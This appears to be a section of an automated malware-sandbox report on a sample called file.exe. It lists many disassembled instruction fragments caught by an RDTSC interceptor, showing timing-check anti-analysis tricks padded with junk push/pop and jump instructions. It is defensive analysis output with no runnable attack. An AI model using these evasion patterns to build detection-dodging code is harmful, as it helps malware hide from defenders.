                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A49000 second address: A4900F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jng 00007F1B74BBC1C6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4A121 second address: A4A126 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A49178 second address: A49197 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B74BBC1CCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a ja 00007F1B74BBC1C6h 0x00000010 pop edx 0x00000011 popad 0x00000012 push eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4B14A second address: A4B165 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1B751F19E7h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4B165 second address: A4B1E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F1B74BBC1C8h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 add bx, B807h 0x0000002a push 00000000h 0x0000002c jnp 00007F1B74BBC1CAh 0x00000032 push 00000000h 0x00000034 mov bh, 16h 0x00000036 xchg eax, esi 0x00000037 push ebx 0x00000038 jmp 00007F1B74BBC1D5h 0x0000003d pop ebx 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 jmp 00007F1B74BBC1CAh 0x00000047 jmp 00007F1B74BBC1D9h 0x0000004c popad 0x0000004d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A49197 second address: A49235 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1B751F19DDh 0x0000000b popad 0x0000000c nop 0x0000000d mov edi, dword ptr [ebp+122D380Ch] 0x00000013 push dword ptr fs:[00000000h] 0x0000001a or edi, dword ptr [ebp+122D39ACh] 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 and di, F11Dh 0x0000002c mov eax, dword ptr [ebp+122D03A9h] 0x00000032 jmp 00007F1B751F19E4h 0x00000037 push FFFFFFFFh 0x00000039 push 00000000h 0x0000003b push ecx 0x0000003c call 00007F1B751F19D8h 0x00000041 pop ecx 0x00000042 mov dword ptr [esp+04h], ecx 0x00000046 add dword ptr [esp+04h], 0000001Ch 0x0000004e inc ecx 0x0000004f push ecx 0x00000050 ret 0x00000051 pop ecx 0x00000052 ret 0x00000053 nop 0x00000054 pushad 0x00000055 push edi 0x00000056 push eax 0x00000057 pop eax 0x00000058 pop edi 0x00000059 jmp 00007F1B751F19E3h 0x0000005e popad 0x0000005f push eax 0x00000060 pushad 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007F1B751F19DCh 0x00000068 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4D1F7 second address: A4D204 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a push edx 0x0000000b pop edx 0x0000000c pop ebx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4D204 second address: A4D20A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4E43B second address: A4E448 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1B74BBC1C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4D43D second address: A4D441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4D441 second address: A4D445 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4C2EA second address: A4C2EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4A22D second address: A4A23F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F1B74BBC1CAh 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4C2EF second address: A4C2F4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4E6B9 second address: A4E6BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EF534 second address: 9EF540 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F1B751F19D6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5EB24 second address: A5EB46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F1B74BBC1D9h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5EB46 second address: A5EB95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jl 00007F1B751F19E2h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jp 00007F1B751F19E4h 0x00000017 mov eax, dword ptr [eax] 0x00000019 pushad 0x0000001a pushad 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d jng 00007F1B751F19D6h 0x00000023 popad 0x00000024 push edi 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 pop edi 0x00000028 popad 0x00000029 mov dword ptr [esp+04h], eax 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 push ecx 0x00000031 pop ecx 0x00000032 pushad 0x00000033 popad 0x00000034 popad 0x00000035 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5ED02 second address: A5ED22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B74BBC1D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push edx 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A637A3 second address: A637A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A62A3F second address: A62A45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A62A45 second address: A62A4D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A62A4D second address: A62A52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A62BC6 second address: A62BDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jnc 00007F1B751F19DEh 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A62E80 second address: A62E84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A62E84 second address: A62E8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A62E8C second address: A62E94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A632F6 second address: A632FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A632FA second address: A632FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A632FE second address: A63310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007F1B751F19D6h 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A63310 second address: A63314 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A63314 second address: A6331A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6331A second address: A63327 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1B74BBC1C8h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A63327 second address: A6332D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6348F second address: A634B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1B74BBC1D6h 0x00000009 pop edx 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A634B0 second address: A634C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F1B751F19DEh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A68D43 second address: A68D47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A67D0D second address: A67D5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1B751F19E3h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c pushad 0x0000000d jnc 00007F1B751F19D6h 0x00000013 jng 00007F1B751F19D6h 0x00000019 jmp 00007F1B751F19DDh 0x0000001e popad 0x0000001f push esi 0x00000020 jmp 00007F1B751F19E3h 0x00000025 pop esi 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A67D5A second address: A67D60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A67D60 second address: A67D9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1B751F19E1h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F1B751F19E0h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F1B751F19DFh 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A67D9E second address: A67DA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A67DA2 second address: A67DAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A67DAA second address: A67DB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F1B74BBC1C6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A68472 second address: A68476 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6859F second address: A685B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F1B74BBC1CFh 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A689FC second address: A68A43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jmp 00007F1B751F19E5h 0x0000000f pop esi 0x00000010 jo 00007F1B751F19DAh 0x00000016 pushad 0x00000017 popad 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 jmp 00007F1B751F19DAh 0x00000026 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A68A43 second address: A68A57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B74BBC1CBh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A68A57 second address: A68A5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ebx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6C4BF second address: A6C4CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B74BBC1CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A334D3 second address: A334D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A334D8 second address: A334DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A33A70 second address: A33A75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A33C17 second address: A33C1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A33C1B second address: A33C4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], esi 0x0000000a mov dword ptr [ebp+122DB5E3h], edx 0x00000010 nop 0x00000011 jmp 00007F1B751F19DDh 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jg 00007F1B751F19E0h 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3436F second address: A3438C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B74BBC1D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3473A second address: A34750 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1B751F19E1h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A34750 second address: A3479E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a and ch, 00000022h 0x0000000d lea eax, dword ptr [ebp+12478271h] 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007F1B74BBC1C8h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 00000017h 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d jnl 00007F1B74BBC1CAh 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F1B74BBC1CEh 0x0000003c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3479E second address: A1AAC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a mov dword ptr [esp], eax 0x0000000d xor edi, dword ptr [ebp+122D3406h] 0x00000013 lea eax, dword ptr [ebp+1247822Dh] 0x00000019 call 00007F1B751F19DEh 0x0000001e sub edi, dword ptr [ebp+122D3347h] 0x00000024 pop edi 0x00000025 xor ecx, dword ptr [ebp+122D18FEh] 0x0000002b push eax 0x0000002c jmp 00007F1B751F19E5h 0x00000031 mov dword ptr [esp], eax 0x00000034 mov ecx, dword ptr [ebp+122D342Bh] 0x0000003a call dword ptr [ebp+122D19ACh] 0x00000040 push eax 0x00000041 push edx 0x00000042 jns 00007F1B751F19DCh 0x00000048 jnc 00007F1B751F19DEh 0x0000004e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7161E second address: A71625 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A71625 second address: A71631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F1B751F19D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A71631 second address: A71646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jne 00007F1B74BBC1CAh 0x0000000e push edx 0x0000000f pop edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A75D67 second address: A75D73 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F1B751F19DEh 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A75D73 second address: A75DA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F1B74BBC1CEh 0x0000000a pushad 0x0000000b popad 0x0000000c jbe 00007F1B74BBC1C6h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jl 00007F1B74BBC1CEh 0x0000001f pushad 0x00000020 popad 0x00000021 jl 00007F1B74BBC1C6h 0x00000027 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A75F47 second address: A75F4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7635A second address: A76377 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1B74BBC1D8h 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A76672 second address: A7667D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F1B751F19D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7693E second address: A76942 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A76942 second address: A7694C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A76BFB second address: A76C01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A76C01 second address: A76C07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A76C07 second address: A76C0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A76C0D second address: A76C19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F1B751F19D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A76C19 second address: A76C1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A76C1D second address: A76C32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7709E second address: A770AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jnl 00007F1B74BBC1C6h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 popad 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A770AF second address: A770BF instructions: 0x00000000 rdtsc 0x00000002 je 00007F1B751F19D8h 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A770BF second address: A770C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A770C5 second address: A770DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F1B751F19DCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A770DE second address: A770E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A758BE second address: A758C4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A758C4 second address: A758DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F1B74BBC1D0h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A758DF second address: A7590C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 push esi 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f jmp 00007F1B751F19E0h 0x00000014 jg 00007F1B751F19E2h 0x0000001a jno 00007F1B751F19D6h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7A8E7 second address: A7A8FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1B74BBC1CEh 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7A8FC second address: A7A905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7D7FB second address: A7D7FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7D09C second address: A7D0C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19E3h 0x00000007 jmp 00007F1B751F19DDh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7D0C0 second address: A7D0CB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 ja 00007F1B74BBC1C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7D258 second address: A7D25C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
